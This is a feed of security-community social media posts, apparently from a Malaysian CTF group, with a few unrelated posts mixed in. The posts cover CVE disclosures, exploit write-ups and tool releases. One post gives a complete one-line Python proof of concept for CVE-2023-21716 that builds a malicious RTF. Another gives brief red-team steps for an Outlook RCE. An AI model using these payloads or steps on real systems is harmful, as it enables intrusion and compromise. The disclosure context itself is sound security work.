We are still looking for sponsors for the CTF prizes. If you want to support us and get some visibility during the CTF. Don't hesitate to contact us via [email protected]

The registration will close at 11.59 PM, Wednesday (21 Dec 2022)! Don't forget to register your team now. wargames.my/2022

CVE-2023-24059 Grand Theft Auto V for PC allows attackers to achieve partial remote code execution or modify files on a PC, as exploited in the wild in January 2023. cve.mitre.org/cgi-bin/cvenam…

CVE-2023-21716 Python PoC (take 2) open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))

We've just published a quick write up on CVE-2023-23397, which allows a remote adversary to leak NetNTLMv2 hashes: mdsec.co.uk/2023/03/exploi… by Dominic Chell 👻

Get ready for an exciting new chapter in Wargames Malaysia! With our expertise in both cybersecurity and chocolate making, we're thrilled to announce our latest venture, Chocolate-The-Flag! Stay tuned for the pre-order form! #chocolatetheflag #cybersecuritymeetschocolate

OUT NOW!! Radicalism MV Sebarkan pada semua. MV animation ni 100% buatan anak tempatan! 🤯🤯🤯 youtu.be/zgBcrBdljiQ

Revisiting an old vulnerability in AV that I’ve found and reported. The entire interface and some mechanisms are change but some bug(s) are still there 🤷

One of our pentesters recently got a new D-Link DAP-X1860 repeater, which they couldn't setup. This was caused by a neighbor's Wi-Fi containing a single tick in their Wi-Fi name ("Olaf's WiFi"), resulting in the following error while scanning for access points:

Entangled #fxhash

Looks like someone dropped a Linux kernel 0day github.com/YuriiCrimson/E…

🏭 We've tested the new RCE in Microsoft Outlook (CVE-2024-21378) in a production environment and confirm it works well! A brief instruction for red teams: 1. Compile our enhanced DLL 👉 gist.github.com/Homer28/7f3559… 2. Use NetSPI's ruler and wait! No back connect required! 🔥 📐📏

This is the PS Hanami, my handmade Playstation 1 portable that I designed and built in one month! It uses a REAL PS1 motherboard that I cut in half, folded like a book, and rewired. NO emulation! Details in🧵 bitbuilt.net/forums/index.p…

Progress just un-embargoed a very closely guarded auth bypass in MOVEit Transfer's SFTP mechanism - CVE-2024-5806. We were lucky enough to receive a tip-off :-) Enjoy our analysis, we had a lot of fun. labs.watchtowr.com/auth-bypass-in…

Dropped a new tool at DEF CON 32! Loot SCCM Distribution points via HTTP with github.com/badsectorlabs/… We've found credentials, certificates, custom apps, keystores, etc. What will you find?

[RELEASE] Following the talk at DEF CON, I'm releasing all the POC projects associated with DriverJack. More info in the repos. For any additional info, hit me up ;) - github.com/klezVirus/Driv… - github.com/klezVirus/RpcP… - github.com/klezVirus/kopp…

1/ Recently a team reached out to me for assistance after $1.3M was stolen from the treasury after malicious code had been pushed. Unbeknownst to the team they had hired multiple DPRK IT workers as devs who were using fake identities. I then uncovered 25+ crypto projects with

TM started to hijack request over DoH (DNS over HTTPS), DoT (DNS over TLS), and hijack response. Malaysia great firewall! Have to option in for less common public DNS or use private DNS with unique personal url.

I wrote a proof of concept for the so-called LNK zero day. I think it’s just a feature rather than vulnerability. But who knows :-) gist.github.com/nafiez/1236cc4…